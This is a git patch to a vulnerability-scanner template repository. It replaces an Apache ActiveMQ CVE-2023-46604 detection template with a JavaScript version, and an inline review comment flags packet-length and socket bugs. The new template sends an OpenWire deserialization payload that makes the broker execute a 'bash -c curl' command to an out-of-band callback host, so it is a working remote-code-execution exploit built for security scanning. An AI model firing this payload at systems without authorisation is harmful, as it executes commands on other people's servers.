From 2768ab1b32e081d99731d6c2850a512cde920cb7 Mon Sep 17 00:00:00 2001
From: Sandeep Singh
Date: Tue, 12 Dec 2023 18:35:16 +0530
Subject: [PATCH] Improved template for CVE-2023-46604 detection (#8807)

* Added JS based template for CVE-2023-46604
* removed less reliable template
---
 javascript/cves/2023/CVE-2023-46604.yaml | 64 ++++++++++++++++++++++++
 network/cves/2023/CVE-2023-46604.yaml | 52 -------------------
 2 files changed, 64 insertions(+), 52 deletions(-)
 create mode 100644 javascript/cves/2023/CVE-2023-46604.yaml
 delete mode 100644 network/cves/2023/CVE-2023-46604.yaml

diff --git a/javascript/cves/2023/CVE-2023-46604.yaml b/javascript/cves/2023/CVE-2023-46604.yaml
new file mode 100644
index 0000000000..58c81eea4a
--- /dev/null
+++ b/javascript/cves/2023/CVE-2023-46604.yaml
@@ -0,0 +1,64 @@ +id: CVE-2023-46604 + +info: + name: Apache ActiveMQ - Remote Code Execution + author: Ice3man,Mzack9999,pdresearch + severity: critical + description: | + Apache ActiveMQ is vulnerable to Remote Code Execution.The vulnerability may allow a remote attacker with network access to a broker to run arbitrary shell commands by manipulating serialized class types in the OpenWire protocol to cause the broker to instantiate any class on the classpath. + Users are recommended to upgrade to version 5.15.16, 5.16.7, 5.17.6, or 5.18.3, which fixes this issue. + reference: + - http://www.openwall.com/lists/oss-security/2023/10/27/5 + - https://activemq.apache.org/security-advisories.data/CVE-2023-46604-announcement.txt + - https://github.com/X1r0z/ActiveMQ-RCE + - https://attackerkb.com/topics/IHsgZDE3tS/cve-2023-46604/rapid7-analysis?referrer=etrblog + - https://paper.seebug.org/3058/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2023-46604 + cwe-id: CWE-502 + epss-score: 0.96805 + epss-percentile: 0.99601 + cpe: cpe:2.3:a:apache:activemq:*:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + vendor: apache + product: activemq + shodan-query: product:"ActiveMQ OpenWire Transport" + tags: cve,cve2023,network,rce,apache,activemq,deserialization,kev + +variables: + prefix: "1f00000000000000000001010042" + classname: "6f72672e737072696e676672616d65776f726b2e636f6e746578742e737570706f72742e436c61737350617468586d6c4170706c69636174696f6e436f6e7465787401" + final: "{{prefix}}{{classname}}" + +javascript: + - code: | + let m1 = require('nuclei/net'); + let m2 = require('nuclei/bytes'); + let b = m2.Buffer(); + let name=Host+':'+Port; + let conn = m1.Open('tcp', name); + let oob='{{interactsh-url}}' + let randomvar = '{{randstr}}' + var Base64={encode: btoa} + exploit_xml='http://{{interactsh-url}}/b64_body:'+Base64.encode(' bash-ccurl http://$(echo '+randomvar+').'+oob+' ') +'/' + 
packet="00000001100000006401010100436f72672e737072696e676672616d65776f726b2e636f6e746578742e737570706f72742e46696c6553797374656d586d6c4170706c69636174696f6e436f6e74657874010" + packet+=(exploit_xml.length).toString(16) + packet+=(b.WriteString(exploit_xml)).Hex() + conn.SendHex(packet); + resp = conn.RecvString() + randomvar + + args: + Host: "{{Host}}" + Port: "61616" + + matchers: + - type: dsl + dsl: + - 'contains(interactsh_protocol, "dns")' + - 'contains(interactsh_request, response)' + condition: and \ No newline at end of file diff --git a/network/cves/2023/CVE-2023-46604.yaml b/network/cves/2023/CVE-2023-46604.yaml deleted file mode 100644 index d2966418c7..0000000000 --- a/network/cves/2023/CVE-2023-46604.yaml +++ /dev/null 
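Review bot: The OpenWire length prefix for the `exploit_xml` string is built from a hard-coded `0` nibble at the end of the `packet` literal plus `(exploit_xml.length).toString(16)` with no zero-padding, so the 2-byte big-endian short (the class-name string just before it uses the same encoding, `0043` for a 67-byte name) is only correct when the payload length is 256–4095 bytes; a shorter interactsh hostname or a longer XML body would shift the frame and silently break detection. Drop the trailing `0` from the literal and emit the field as `packet+=exploit_xml.length.toString(16).padStart(4,'0')`. The socket from `m1.Open('tcp', name)` is never released in the new code; add `conn.Close()` after the `conn.RecvString()` call. Note also that, unlike the removed network template which only provoked the broker into fetching a URL, this payload appears (the XML tags are lost in this rendering) to make the broker execute `bash -c curl …` through the fetched Spring bean definition — real command execution on the target — which the description and tags should state explicitly so operators know this is not a passive check.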
@@ -1,52 +0,0 @@ -id: CVE-2023-46604 - -info: - name: Apache ActiveMQ - Remote Code Execution - author: Ice3man,Mzack9999,pdresearch - severity: critical - description: | - Apache ActiveMQ is vulnerable to Remote Code Execution.The vulnerability may allow a remote attacker with network access to a broker to run arbitrary shell commands by manipulating serialized class types in the OpenWire protocol to cause the broker to instantiate any class on the classpath. - Users are recommended to upgrade to version 5.15.16, 5.16.7, 5.17.6, or 5.18.3, which fixes this issue. - reference: - - http://www.openwall.com/lists/oss-security/2023/10/27/5 - - https://activemq.apache.org/security-advisories.data/CVE-2023-46604-announcement.txt - - https://github.com/X1r0z/ActiveMQ-RCE - - https://attackerkb.com/topics/IHsgZDE3tS/cve-2023-46604/rapid7-analysis?referrer=etrblog - - https://paper.seebug.org/3058/ - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:H/A:H - cvss-score: 10 - cve-id: CVE-2023-46604 - cwe-id: CWE-502 - epss-score: 0.00053 - metadata: - max-request: 1 - shodan-query: product:"ActiveMQ OpenWire Transport" - verified: true - tags: cve,cve2023,network,rce,apache,activemq,deserialization - -variables: - prefix: "1f00000000000000000001010042" - classname: "6f72672e737072696e676672616d65776f726b2e636f6e746578742e737570706f72742e436c61737350617468586d6c4170706c69636174696f6e436f6e7465787401" - final: "{{prefix}}{{classname}}" - -tcp: - - inputs: - - data: "{{hex_decode('00000'+dec_to_hex(len(final+'00'+dec_to_hex(len('http://{{interactsh-url}}'))+hex_encode('http://{{interactsh-url}}')))+final+'00'+dec_to_hex(len('http://{{interactsh-url}}'))+hex_encode('http://{{interactsh-url}}'))}}" - - host: - - "{{Hostname}}" - port: 61616 - - matchers-condition: and - matchers: - - type: word - part: interactsh_protocol - - "http" - - - type: word - words: - - "ActiveMQ" - - "StackTraceEnabled" - condition: and -# digest: 
4b0a00483046022100f363443cf43dcc6cfff466d9b2f2606a19f6366bf864994566b83a1b1a62b524022100886785b126a725f1ea5ff4295d1d61cfc9767f17a1a5de7d28c16744f15d1bfe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file